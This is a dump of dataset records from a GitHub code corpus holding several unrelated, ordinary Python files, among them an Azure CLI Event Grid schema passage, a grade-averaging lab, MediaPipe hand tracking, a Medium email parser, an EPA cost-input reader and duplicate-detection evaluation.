serialized_name=\"validationScheme\",\n )\n\n allowed_thumbprints = _schema_client_read.properties.client_certificate_authentication.allowed_thumbprints\n allowed_thumbprints.Element = AAZStrType()\n\n system_data = _schema_client_read.system_data\n system_data.created_at = AAZStrType(\n serialized_name=\"createdAt\",\n )\n system_data.created_by = AAZStrType(\n serialized_name=\"createdBy\",\n )\n system_data.created_by_type = AAZStrType(\n serialized_name=\"createdByType\",\n )\n system_data.last_modified_at = AAZStrType(\n serialized_name=\"lastModifiedAt\",\n )\n system_data.last_modified_by = AAZStrType(\n serialized_name=\"lastModifiedBy\",\n )\n system_data.last_modified_by_type = AAZStrType(\n serialized_name=\"lastModifiedByType\",\n )\n\n _schema.id = cls._schema_client_read.id\n _schema.name = cls._schema_client_read.name\n _schema.properties = cls._schema_client_read.properties\n _schema.system_data = cls._schema_client_read.system_data\n _schema.type = cls._schema_client_read.type\n\n\n__all__ = [\"Update\"]\n","repo_name":"Azure/azure-cli-extensions","sub_path":"src/eventgrid/azext_eventgrid/aaz/latest/eventgrid/namespace/client/_update.py","file_name":"_update.py","file_ext":"py","file_size_in_byte":22289,"program_lang":"python","lang":"en","doc_type":"code","stars":350,"dataset":"github-code","pt":"5"} +{"seq_id":"16083866384","text":"def weighted_average(in_file_name, out_file_name):\n in_file = open(in_file_name, \"r\")\n out_file = open(out_file_name, \"w\")\n data = in_file.readlines()\n class_avg = 1\n class_total = 0\n for words in data:\n no_name_split = words.split(\": \")\n nums = no_name_split[1]\n nums = nums.split(\" \")\n total = 0\n weight_total = 0\n for i in range(0, len(nums), 2):\n weight_num = nums[i]\n grade_num = nums[i + 1]\n product = int(weight_num) * int(grade_num)\n total = total + product\n weight_total += int(weight_num)\n\n if weight_total == 100:\n student_avg = (total / 100)\n class_total = class_total + student_avg\n class_avg = class_total / len(data)\n print(no_name_split[0] + \"'s average: \", round(student_avg, 1), file=out_file)\n elif weight_total > 100:\n print(no_name_split[0] + \"'s average: Error: The weights are more than 100.\", file=out_file)\n else:\n print(no_name_split[0] + \"'s average: Error: The weights are less than 100.\", file=out_file)\n print(\"Class Average: \", round(class_avg, 1), file=out_file)\n in_file.close()\n 
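# close the output handle as well so the computed averages are flushed to avg.txt\n    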
out_file.close()\n\n\nif __name__ == '__main__':\n weighted_average(\"grades.txt\", \"avg.txt\")\n","repo_name":"Spencerhoag/220","sub_path":"labs/lab7/lab7.py","file_name":"lab7.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8451725661","text":"import cv2 as cv\nimport mediapipe as mp\nimport time\n\nclass handDetection():\n\n # Defining a function for initialization of \"Mediapipe's Hands() function\"\n def __init__(self, imageMode=False, maxHandNumber=2, modelComplexity=1, detectConf=0.5, trackConf=0.5):\n self.imageMode = imageMode\n self.maxHandNumber = maxHandNumber\n self.detectConf = detectConf\n self.trackConf = trackConf\n self.modelComplexity = modelComplexity\n\n # Declaring a 'self' variable to start Mediapipe hand detection module\n self.mpHandModule = mp.solutions.hands\n\n # Declaring another 'self' variable for detecting hands\n self.detectHands = self.mpHandModule.Hands(self.imageMode, self.maxHandNumber, self.modelComplexity,\n self.detectConf, self.trackConf)\n\n # Declaring another 'self' variable to draw lines between landmarks of hands\n self.mpDraw = mp.solutions.drawing_utils\n\n # Creating an array that stores the IDs of fingertips\n self.tipIDs = [4, 8, 12, 16, 20]\n\n\n # Defining a function to find hands in the frame\n def findHand(self, frame, draw=True):\n\n # Converting frame to RGB in order to Mediapipe module to process \n RGBframe = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\n self.handResult = self.detectHands.process(RGBframe)\n\n # Marking hand landmarks with Mediapipe\n self.handLandmarks = self.handResult.multi_hand_landmarks\n if self.handLandmarks:\n for landmark in self.handLandmarks:\n if draw:\n # Showing the landmarks and drawing the lines betweeen points\n self.mpDraw.draw_landmarks(frame, landmark, self.mpHandModule.HAND_CONNECTIONS)\n \n # As result, the function returns the 'frame' value\n return frame\n \n # Defining a function to find positions of landmarks\n def findPosition(self, frame, handNumber=0, draw=True):\n\n # Creating an empty array to store position values\n self.landmarkPositions = []\n\n if self.handLandmarks:\n # Declaring a variable for choosing hand\n handNo = self.handLandmarks[handNumber]\n # Gathering landmark informations\n for id, lm in enumerate(handNo.landmark):\n # Getting height, width and channel info of 'frame'\n height, width, channel = frame.shape\n\n # Since the 'lm' values gives the decimal values of points,\n # in other words, giving the ratio of points to the 'frame',\n # we have to multiply these values with height and width values of 'frame' to get locations of points.\n posX, posY = int(lm.x * width), int(lm.y * height)\n\n # Adding calculated X and Y positions with finger IDs to the list which created at the beginning of the function\n self.landmarkPositions.append([id, posX, posY])\n\n # If 'draw' parameter is set as 'True', then draw circles on each finger landmark\n if draw:\n cv.circle(frame, (posX, posY), 10, (0, 255, 255), cv.FILLED)\n\n # As result, the function returns the 'landmarkPositions' value\n return self.landmarkPositions\n\n # Defining a function to count raised fingers\n def fingersUp(self):\n\n # Creating an empty array to store situations of fingers\n fingerSituation = []\n\n # If the Landmark 0 is at the right of the Landmark 1, then there is right hand in the frame\n if self.landmarkPositions[0][1] > self.landmarkPositions[1][1]:\n rightHand = True\n else:\n rightHand = False\n\n 
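# Worked example: tipIDs[0] == 4 is the thumb tip; for a right hand the thumb\n        # counts as raised when landmark 4's x-coordinate is smaller than landmark 3's\n        # (i.e. the tip lies to the left of the joint below it).\n        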
########################################\n # If a fingertip's landmark is below the previous two indexes relative to its y-coordinate,\n # it means that, that finger is closed.\n # But if the thumb is closed, the index of the tip will not be below of the previous index;\n # it's further to the right if it is right hand.\n # Therefore, the x-coordinate of the thumb tip should be checked, not the y-coordinate.\n ########################################\n\n # If it is right hand, then the thumb tip will be on the left of the previous index when the finger is up/open\n if rightHand:\n if self.landmarkPositions[self.tipIDs[0]][1] < self.landmarkPositions[self.tipIDs[0]-1][1]:\n # If the finger is opened, then add '1' to the 'fingerSituation' list\n fingerSituation.append(1)\n else:\n # If not, add '0' to the list\n fingerSituation.append(0)\n # If it is left hand, the opposite of the previous check should be performed\n else:\n if self.landmarkPositions[self.tipIDs[0]][1] > self.landmarkPositions[self.tipIDs[0]-1][1]:\n fingerSituation.append(1)\n else:\n fingerSituation.append(0)\n\n # For the other fingers, the y-coordinate of landmarks should be checked\n for i in range(1, 5):\n if self.landmarkPositions[self.tipIDs[i]][2] < self.landmarkPositions[self.tipIDs[i]-2][2]:\n fingerSituation.append(1)\n else:\n fingerSituation.append(0)\n\n return fingerSituation\n\ndef main():\n\n # Capturing the frames with the built-in webcam\n # The number '0' can be changed according to the webcams connected to PC (eg. VideoCapture(1), VideoCapture(2), ...)\n capture = cv.VideoCapture(0)\n\n # If camera is not opened, then exit the program.\n if not capture.isOpened():\n print(\"Camera can not be opened!\")\n exit()\n\n # Declaring a variable to calculate the FPS\n previousTime = 0\n\n # Initializating the 'handDetection()' function with a variable\n detect = handDetection()\n\n while True:\n # Capturing frames and giving mirror view\n ret, frame = capture.read()\n frame = cv.flip(frame, 1)\n\n # Running the 'findHand' function to be able to detect hands \n frame = detect.findHand(frame)\n\n # Detecting positions of landmarks and printing them\n landmarkPositions = detect.findPosition(frame)\n\n # If no hands are detected after the webcam is turned on, the program will give an error\n # To prevent this, the landmark positions are printed only when a landmark is detected\n if len(landmarkPositions) != 0:\n print(landmarkPositions[0])\n\n # When frames are read correctly, then 'ret' will be True\n if not ret:\n print(\"Frames can not be received. 
Exiting...\")\n break\n\n # Calculating the FPS and displaying it on the frame\n currentTime = time.time()\n FPS = 1 / (currentTime - previousTime)\n previousTime = currentTime\n cv.putText(frame, f\"FPS: {int(FPS)}\", (10, 35), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n\n # Displaying the captured frames\n cv.imshow(\"Hand Tracking\", frame)\n\n # End the 'while' loop (shortly, kill the program) if the key 'q' is pressed\n if cv.waitKey(1) == ord(\"q\"):\n break\n \n # Releasing the capture and kill the windows that are opened, if everything is done\n capture.release()\n cv.destroyAllWindows()\n\nif __name__ == \"__main__\":\n main()","repo_name":"efetunca/Virtual-Painter","sub_path":"HandTrackingModule.py","file_name":"HandTrackingModule.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22663894118","text":"import datetime\nimport email\nimport hashlib\nimport quopri\n\nfrom bs4 import BeautifulSoup\n\nMEDIUM_URL = \"https://medium.com/\"\nURL_LEN = len(MEDIUM_URL)\n\n\ndef get_subject(subject):\n subject_parts = []\n subjects = email.header.decode_header(subject)\n for content, encoding in subjects:\n try:\n subject_parts.append(content.decode(encoding or \"utf8\"))\n except:\n subject_parts.append(content)\n return \"\".join(subject_parts)\n\n\ndef get_message_id(to, message_id):\n sh1 = hashlib.sha1()\n sh1.update(to.encode())\n sh1.update(message_id.encode())\n return sh1.hexdigest()\n\n\ndef mask_to(to):\n return hashlib.sha1(to.encode()).hexdigest()\n\n\ndef parse_mail(email_message):\n parts = {part.get_content_type(): part for part in email_message.get_payload()}\n decoded = quopri.decodestring(parts[\"text/html\"].get_payload()).decode(\"utf8\")\n to = email_message[\"To\"]\n mail_info = {\n \"id\": get_message_id(to, email_message[\"Message-ID\"]),\n \"to\": mask_to(to),\n \"from\": email_message.get(\"From\"),\n \"subject\": get_subject(email_message.get(\"Subject\")),\n \"date\": datetime.datetime.strptime(\n email_message.get(\"Date\"), \"%a, %d %b %Y %H:%M:%S +0000 (%Z)\"\n ),\n }\n return mail_info, decoded\n\n\ndef get_articles(message):\n soup = BeautifulSoup(message, \"lxml\")\n main = soup.find(\"table\", {\"class\": \"email-fillWidth\"})\n digest = main.find(\"table\", {\"class\": \"email-digest\"})\n\n sections = digest.find_all(\"tr\", recursive=False)\n\n for section in sections:\n [table_cell] = section.findChildren(\"td\", recursive=False)\n section_title_div = table_cell.find(\"div\")\n\n if section_title_div is None:\n continue\n\n section_title = section_title_div.text\n\n article_tables = table_cell.findChildren(\"table\", recursive=False)\n\n for article in article_tables:\n post_title = article.find(\n \"div\", {\"class\": \"email-digestPostTitle--hero\"}\n ) or article.find(\"div\", {\"class\": \"email-digestPostTitle\"})\n post_subtitle = article.find(\"div\", {\"class\": \"email-digestPostSubtitle\"})\n\n post_url, _, _ = post_title.parent.find(\"a\")[\"href\"].partition(\"?\")\n\n anchors = article.find_all(\"a\")\n author = (None, None)\n site = (None, None)\n\n for anchor in anchors:\n url = anchor[\"href\"][URL_LEN:]\n first, _, _ = url.partition(\"?\")\n if first.startswith(\"@\"):\n author = (anchor.text, first)\n else:\n site = (anchor.text, first)\n\n members_only = (\n article.find(\"img\", {\"class\": \"email-digestMemberOnlyStar\"}) is not None\n )\n\n data = {\n \"section_title\": section_title,\n \"post_title\": post_title.text,\n 
\"post_subtitle\": post_subtitle.text if bool(post_subtitle) else None,\n \"post_url\": post_url,\n \"author_name\": author[0],\n \"author_handle\": author[1],\n \"site_name\": site[0],\n \"site_slug\": site[1],\n \"members_only\": members_only,\n }\n yield data\n","repo_name":"fferegrino/medium-collector","sub_path":"medium_collector/download/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28332310542","text":"\"\"\"\n\n**INPUT FILE FORMAT**\n\nThe file format consists of a one-row data header and subsequent data rows.\n\nThe data represent the percentage of engines complying with the new standard, associated with standardyear_id, and in\nthe given year, indicated by the column headers. In the table below, all engines shown comply with the 2027 standards\nin 2027 (and continue to do so) while no engines meet the 2031 standards in 2027 since 2027 engines would be sold prior\nto the 2031 standards being implemented. However, all 2031 engines comply with 2031 and later standards.\n\nFile Type\n comma-separated values (CSV)\n\nSample Data Columns\n .. csv-table::\n :widths: auto\n\n optionID,regClassName,regClassID,FuelName,fuelTypeID,standardyear_id,2027,2031\n 0,LHD45,42,Gasoline,1,2027,1,1\n 0,LHD45,42,Diesel,2,2027,1,1\n 0,LHD45,42,CNG,3,2027,1,1\n 0,LHD45,42,Gasoline,1,2031,,1\n 0,LHD45,42,Diesel,2,2031,,1\n 0,LHD45,42,CNG,3,2031,,1\n\nData Column Name and Description\n :optionID:\n The option or alternative number.\n\n :regClassName:\n The MOVES regulatory class name corresponding to the regClassID.\n\n :regClassID:\n The MOVES regClass ID, an integer.\n\n :FuelName:\n The MOVES fuel type name corresponding to the fuelTypeID.\n\n :fuelTypeID:\n The MOVES fuel type ID, an integer, where 1=Gasoline, 2=Diesel, etc.\n\n :standardyear_id:\n The year in which a new standard or provision (for which a corresponding cost exists) is implemented.\n\n :2027:\n The share of engines meeting a new standard that begins in the standardyear_id.\n\n :2031:\n The share of engines meeting a new standard that begins in the standardyear_id.\n\n----\n\n**CODE**\n\n\"\"\"\nimport sys\nimport pandas as pd\n\nfrom bca_tool_code.general_input_modules.general_functions import read_input_file\nfrom bca_tool_code.general_input_modules.input_files import InputFiles\n\n\nclass TechPenetrations:\n \"\"\"\n\n The TechPenetrations class reads the tech penetrations file and provides methods to query its contents.\n\n \"\"\"\n def __init__(self):\n self._dict = dict()\n self.start_years = list()\n self.value_name = 'techpen'\n self.unit_id = None\n\n def init_from_file(self, filepath, unit_id):\n \"\"\"\n\n Parameters:\n filepath: Path to the specified file.\\n\n unit_id: str; 'engine_id' or 'vehicle_id'.\n\n Returns:\n Reads file at filepath; converts monetized values to analysis dollars (if applicable); creates a dictionary\n and other attributes specified in the class __init__.\n\n \"\"\"\n df = read_input_file(filepath, skiprows=1)\n\n self.unit_id = unit_id\n if unit_id == 'engine_id':\n df.insert(0,\n unit_id,\n pd.Series(zip(\n df['regClassID'],\n df['fuelTypeID']\n )))\n id_vars = ['optionID', unit_id, 'regClassID', 'fuelTypeID', 'standardyear_id']\n elif unit_id == 'vehicle_id':\n df.insert(0,\n unit_id,\n pd.Series(zip(\n df['sourceTypeID'],\n df['regClassID'],\n df['fuelTypeID']\n )))\n id_vars = ['optionID', unit_id, 'sourceTypeID', 'regClassID', 'fuelTypeID', 
'standardyear_id']\n else:\n print(f'\\nImproper unit_id passed to {self}')\n sys.exit()\n\n df = pd.melt(df,\n id_vars=id_vars,\n value_vars=[col for col in df.columns if '20' in col],\n var_name='modelyear_id',\n value_name=self.value_name)\n\n df['modelyear_id'] = pd.to_numeric(df['modelyear_id'])\n self.start_years = df['modelyear_id'].unique()\n\n key = pd.Series(zip(\n df[unit_id],\n df['optionID'],\n df['modelyear_id'],\n df['standardyear_id'],\n ))\n df.set_index(key, inplace=True)\n\n self._dict = df.to_dict('index')\n\n # update input_files_pathlist if this class is used\n InputFiles.update_pathlist(filepath)\n\n def get_attribute_value(self, vehicle, standardyear_id):\n \"\"\"\n\n Parameters:\n vehicle: object; an object of the Vehicle class.\n standardyear_id: int; the year in which a new standard starts.\n\n Returns:\n A single tech penetration value for the given vehicle.\n\n \"\"\"\n unit_id = vehicle.engine_id\n if self.unit_id == 'vehicle_id':\n unit_id = vehicle.vehicle_id\n option_id, modelyear_id = vehicle.option_id, vehicle.modelyear_id\n year = max([int(year) for year in self.start_years if int(year) <= modelyear_id])\n\n return self._dict[unit_id, option_id, year, standardyear_id][self.value_name]\n","repo_name":"USEPA/EPA_HD_CTI_BCA","sub_path":"bca_tool_code/general_input_modules/tech_penetrations.py","file_name":"tech_penetrations.py","file_ext":"py","file_size_in_byte":4959,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"70606434711","text":"# *** Evaluation ***\n\"\"\" Script receives the dataframe with the processed and analyzed testdata. \nUses the given similarity-scores for each pair to decide if the pair is part of the class duplicate or non-duplicate.\nSimilarity-scores are rated with a threshold. \n\n# SET Measurements\n --> The threshold is defined by a class object and varies with each method.\n Threshold, depending on source_url, delivers best result and is set via trial and error for each method.\n\n# CLASSIFY data\n --> The pairs that get classified as duplicates are stored in an output df called df_pairs. \n\n# EVALUATE data\n --> The function __classification() is used for a classification report in logging. Only used for masterthesis.\n --> The function __plotting() is used for visualization of the results. 
Only used for masterthesis.\n\n\nInspired by: https://www.kaggle.com/currie32/predicting-similarity-tfidfvectorizer-doc2vec \"\"\"\n\n# ## Imports\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nimport matplotlib.pyplot as plt\nfrom collections import Counter\nimport seaborn as sns\nimport logging\n\n# ## Class Threshold\nclass Threshold:\n \"\"\" Class to manage the setter and getter for the threshold-objects depending on the methods and source_urls.\"\"\"\n # init method\n def __init__(self, name, df):\n self.name = name\n self.df = df\n self.threshold = None\n self.threshold_source = None\n\n # getter method for thresholds depending on source_url\n def get_threshold_source(self): \n return self.threshold_source\n\n # getter method for threshold\n def get_threshold(self): \n return self.threshold \n\n # setter method for thresholds depending on source_url \n def set_threshold_source(self):\n df = self.df\n step_key = self.name\n if self.name == \"countvec\":\n threshold = (df[step_key].mean() + df[step_key].std()+ df[step_key].std()+ df[step_key].std()) \n elif self.name ==\"doc2vec\":\n threshold = (df[step_key].mean()+ df[step_key].std()+ df[step_key].std()/2)\n elif self.name == \"levenshtein\":\n threshold = (df[step_key].mean() + df[step_key].std()+ df[step_key].std())\n elif self.name == \"tfidf\":\n threshold = (df[step_key].mean() + df[step_key].std()+ df[step_key].std()+ df[step_key].std())\n elif self.name == \"shingling\":\n threshold = (df[step_key].mean() + df[step_key].std()+ df[step_key].std()+ df[step_key].std())\n self.threshold_source = threshold\n\n # setter method for threshold\n def set_threshold(self):\n df = self.df\n step_key = self.name\n if self.name == \"countvec\":\n threshold = (df[step_key].mean()) \n elif self.name == \"doc2vec\":\n threshold = (df[step_key].mean()+ df[step_key].std())\n elif self.name == \"levenshtein\":\n threshold = (df[step_key].mean()+ df[step_key].std()) \n elif self.name == \"tfidf\":\n threshold = (df[step_key].mean()+ df[step_key].std()/2)\n elif self.name == \"shingling\":\n threshold = (df[step_key].mean())\n self.threshold = threshold\n\n\n# ## Functions\ndef starter(df: pd.DataFrame, step_key: str) -> pd.DataFrame:\n\n \"\"\"Function iterates over dataframe and evaluates the final data. Returns a df with the chosen duplicate pairs.\n\n Parameters\n ----------\n df: pd.DataFrame\n Dataframe contains one table from the input Dictionary to be evaluated.\n step_key: str\n String with the step_key to define which parts of the program need to be used.\n \n Raises\n ------\n KeyError\n Check if a specific column exists in the DataFrame\n\n Returns\n -------\n df_pairs: pd.Dataframe\n Dataframe with the Output-duplicates (pairwise). \"\"\"\n\n # Set Output DataFrame to store found duplicate-pairs\n df_pairs = pd.DataFrame()\n\n # Initiate Threshold-object to set different values depending on metadata \"source_url\"\n thres_obj = Threshold(step_key, df)\n thres_obj.set_threshold_source()\n thres_obj.set_threshold()\n\n # Set scores-list\n scores = list()\n\n # A. 
SET Measurements\n    # --------------------\n    \"\"\" Iterate over df, check if a pair has the same source_website and set threshold (higher for same urls and lower for different urls) \"\"\"\n    for ind in df.index:\n        if ind%2 == False:\n            if df['source_website'][ind] == df['source_website'][ind+1]:\n                # get higher threshold\n                threshold = thres_obj.get_threshold_source()\n            else:\n                # get lower threshold\n                threshold = thres_obj.get_threshold()\n        else: \n            pass\n\n        \"\"\"# If you want to use a generalized threshold for all methods and not a source-related one, use the following line.\n        threshold = (df[step_key].mean()+ df[step_key].std())\"\"\"\n\n        # B. CLASSIFY the data\n        # --------------------\n        \"\"\" Check if a job-ad has a score over or under the threshold and store the positives in df_pairs.\"\"\"\n        if np.count_nonzero(float(df[step_key][ind]) >= threshold):\n            scores.append(1)\n            \"\"\" The following line is commented out because it is only needed for masterthesis.\n            df.at[ind, 'Shingling_duplicate'] = 1\"\"\"\n            df_pairs = df_pairs.append(df.iloc[ind], ignore_index=True)\n        else:\n            scores.append(0)\n            # following line commented out, only needed for masterthesis\n            \"\"\" df.at[ind, 'Shingling_duplicate'] = 0\n            df_pairs = df_pairs.append(df.iloc[ind], ignore_index=True) \"\"\"\n\n    # C. EVALUATE data\n    # -----------------\n    \"\"\" Get Classification report in logging. Only needed for annotated testdata. In real implementation it is not used or commented out. \"\"\"\n    __classification(step_key, thres_obj, df, scores)\n\n    \"\"\"Get Plotting of results in logging. Only needed for annotated testdata. In real implementation it is not used or commented out. \"\"\"\n    __plotting(step_key, df)\n    return df_pairs\n\n# Classification Report\ndef __classification(step_key, thres_obj, df, scores):\n    \"\"\" Logs a classification report in the Logging-file (Logger.log). \n    Contains:\n    * threshold-settings\n    * mean\n    * median\n    * standard deviation\n    * accuracy\n    * confusion matrix\n    * classification report \"\"\"\n\n    # Check if input-dataframe contains annotated data, if function is not called.\n    if 'testset_id' in df:\n        try:\n            logging.info('\\n\\n***** EVALUATION: CLASSIFICATION REPORT *****')\n            # Only count every second row because one pair = 2 rows and 2 scores (but only one needs to be counted)\n            accuracy = accuracy_score(df.duplicate[df.index % 2 != 0], scores[0::2]) * 100\n            logging.info(f'''\\n\\n{step_key}:\n            threshold set to: {thres_obj.get_threshold_source()} & {thres_obj.get_threshold()}\n            MEAN {df[step_key].mean()}\n            MEDIAN {df[step_key].median()}\n            STANDARD DEVIATION {df[step_key].std()}\n            \\nAccuracy score is {round(accuracy)}%.\n            \\nConfusion Matrix:\\n{confusion_matrix(df.duplicate[df.index % 2 != 0], scores[0::2])}\n            \\nClassification Report:\\n{classification_report(df.duplicate[df.index % 2 != 0], scores[0::2])}''')\n            logging.info('\\n\\n***** /EVALUATION: CLASSIFICATION REPORT *****')\n        except KeyError:\n            logging.warning('Classification Report was not generated, because no annotation was given.')\n            pass\n    else:\n        logging.warning('Classification report was not generated because of missing annotation. Check again if needed.')\n\n# Plotting\ndef __plotting(step_key, df):\n    \"\"\" Function plots the distribution of Similarity-Scores for a chosen method. 
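Scores are split by the annotated duplicate label in a violin plot; the red vertical\n    line marks the mean plus one standard deviation, and the resulting figure is saved\n    under temp/temps_analysis_in/. 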
\"\"\"\n \n # Check if input-dataframe contains annotated data, if function is not called.\n if 'testset_id' in df:\n try:\n logging.getLogger('matplotlib.font_manager').disabled = True\n sns.set_theme(style=\"ticks\", color_codes=True) \n x = df[step_key][df.index % 2 != 0] # Excludes every 2rd row starting from 0\n sns.violinplot(x=df[step_key], y=df.duplicate, orient='h', linewidth=3, data=x)\n ax = plt.gca()\n ax.set_yticks([0,1]) \n ax.set_yticklabels(['Nicht-Dubletten', 'Dubletten'])\n plt.axvline((df[step_key].mean()+ df[step_key].std()) , color='r')\n plt.xlabel(step_key)\n plt.xlim(0,1)\n #plt.show()\n plt.savefig(f'temp/temps_analysis_in/{step_key}_plots.png')\n plt.close()\n logging.info(f'Plotting used to visualize the results. Saved in file temp/temp_analysis_in/{step_key}_plots.png')\n except KeyError:\n logging.warning('while plotting, some column or value is missing. Check again if plotting is needed.')\n else:\n logging.warning('Plotting visualization was not generated, because no annotation was given.')\n pass","repo_name":"agerlac1/dupli","sub_path":"code/analysis/analysis_inside/evaluate_ratios.py","file_name":"evaluate_ratios.py","file_ext":"py","file_size_in_byte":9188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33474557488","text":"import cv2\r\nimport numpy as np\r\nfrom object_detection import ObjectDetection\r\nimport math\r\n\r\n# Initialize Object Detection\r\nod = ObjectDetection()\r\n\r\n#cap = cv2.VideoCapture(\"los_angeles.mp4\")\r\ncap = cv2.VideoCapture(\"ucak1.mp4\")\r\n#cap = cv2.VideoCapture(\"yangin1.mp4\")\r\n\r\n# Initialize count\r\ncount = 0\r\ncenter_points_prev_frame = []\r\n\r\ntracking_objects = {}\r\ntrack_id = 0\r\n\r\nwhile True:\r\n ret, frame = cap.read()\r\n count += 1\r\n if not ret:\r\n break\r\n\r\n # Point current frame\r\n center_points_cur_frame = []\r\n\r\n # Detect objects on frame\r\n (class_ids, scores, boxes) = od.detect(frame)\r\n print(class_ids)\r\n for box in boxes:\r\n (x, y, w, h) = box\r\n cx = int((x + x + w) / 2)\r\n cy = int((y + y + h) / 2)\r\n center_points_cur_frame.append((cx, cy))\r\n #print(\"FRAME N°\", count, \" \", x, y, w, h)\r\n\r\n # cv2.circle(frame, (cx, cy), 5, (0, 0, 255), -1)\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n\r\n\r\n for object_id, pt in tracking_objects.items():\r\n cv2.circle(frame, pt, 5, (0, 0, 255), -1)\r\n cv2.putText(frame, str(object_id), (pt[0], pt[1] - 7), 0, 1, (0, 0, 255), 2)\r\n\r\n\r\n cv2.imshow(\"Frame\", frame)\r\n\r\n key = cv2.waitKey(1)\r\n if key == 27:\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"bulentsezen/yolov4","sub_path":"object_tracking - 1.py","file_name":"object_tracking - 1.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"33098323418","text":"import json\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nf = open(\"sample_data.flight\", \"r\")\nflightData = json.load(f)\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nx_data = []\ny_data = []\nz_data = []\n\nfor coord in flightData[\"legalPoints\"]:\n x_data.append(coord[1])\n y_data.append(coord[2])\n z_data.append(coord[3])\n\n\nax.scatter(x_data, y_data, z_data, s=6, c=\"k\", marker='o')\n\nax.set_xlabel('x')\nax.set_ylabel('y')\nax.set_zlabel('z')\nax.set_xlim3d(0, 15)\nax.set_ylim3d(0, 15)\nax.set_zlim3d(0, 
10)\nax.set_title(\"Flight Path\")\n\nfig.show()\nplt.show()","repo_name":"JonathanGWesterfield/Capstone","sub_path":"DroneDetection/plot2.py","file_name":"plot2.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"25246966525","text":"\"\"\"\nCalled by app.py when `/error` route is called.\n\nLast updated: MB 27/09/2020 - created module.\n\"\"\"\n# import external libraries.\nimport os\nfrom flask import render_template, request, jsonify, redirect\n\n# import local modules.\nfrom src import error_controller, cache_handler\n\n\"\"\"\nCalled in app.py to initialise the routes in this file.\n\"\"\"\ndef init(app):\n\n    \"\"\"\n    Called by app.py. Retrieve new error information from DynamoDB if 'refresh'\n    parameter is True. Otherwise display the currently cached error data.\n    \"\"\"\n    @app.route(\"/errors\", methods=['GET'])\n    def errorDashboard():\n        # check for refresh argument.\n        refresh = request.args.get('refresh', default=False, type=bool)\n\n        # if refresh is true, reload bot information into the cache.\n        if refresh is True:\n            print('refresh error list...')\n            error_controller.update_error_cache()\n\n        # render the bot template with current cached data.\n        return render_template('pages/errorDashboard.html', data={**cache_handler.render_dict, **{\n            'errors': cache_handler.error_dict,\n        }})\n\n    \"\"\"\n    Called by app.py. Delete the error from cache and the db project.\n    \"\"\"\n    @app.route(\"/error/del\", methods=['POST'])\n    def deleteError():\n        # retrieve all log file names.\n        log_files = [v for v in request.form if '.log' in v]\n\n        # if there was not a log file 'name' in the form, return invalid.\n        if len(log_files) == 0:\n            return jsonify(status=400, success=False)\n\n        # run delete function.\n        error_controller.remove_error(log_files[0])\n\n        # render the bot template with current cached data.\n        return redirect(\"/errors\")\n","repo_name":"Dwini/FIT4002_Ad_Transparency","sub_path":"dashboard/routes/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"}
+{"seq_id":"34199905319","text":"def url_list_text_to_corpus(file,output):\n    import os\n    import input_texter\n    import bash_commander\n    import wiki_searcher\n    import input_type\n    \n    text=''\n    with open(file,'r') as f:\n        raw_input=[line.strip() for line in f.readlines()]\n    a=len(raw_input)\n    print(\"Number of URLs to process: \",a)\n    #text=input_texter()\n    #if not bool(os.path.isfile(out)):\n    #    f=open(out,'x')\n    #    f.close()\n    #else:\n    #    pass\n    \n    for i,line in enumerate(raw_input):\n        try:\n            print(line)\n            out=input_texter(line)\n            text=text+\" \"+out\n            print(len(text))\n            print(i,\" out from total: \",a,\" \",\"|\",a-i,\" left.\")\n            f=open(output,'a')\n            print(\"Destination file opened.\")\n            print(\"Length of the text to write: \",len(text))\n            f.write(text)\n            print(\"File written.\")\n            f.close()\n            print(\"Done, closing the file..\")\n            #text.close()\n            print(\"Data collection finished, file closed.\")\n        except:\n            continue\n        #if i>5:\n        #    break\n    \n    \n    #print(\"Destination file opened.\")\n    #print(\"Length of the text to write: \",len(text))\n    #f.write(text)\n    #print(\"File written.\")\n    #f.close()\n    #print(\"Done, closing the file..\")\n    ##text.close()\n    #print(\"Data collection finished, file closed.\")\n    #return 
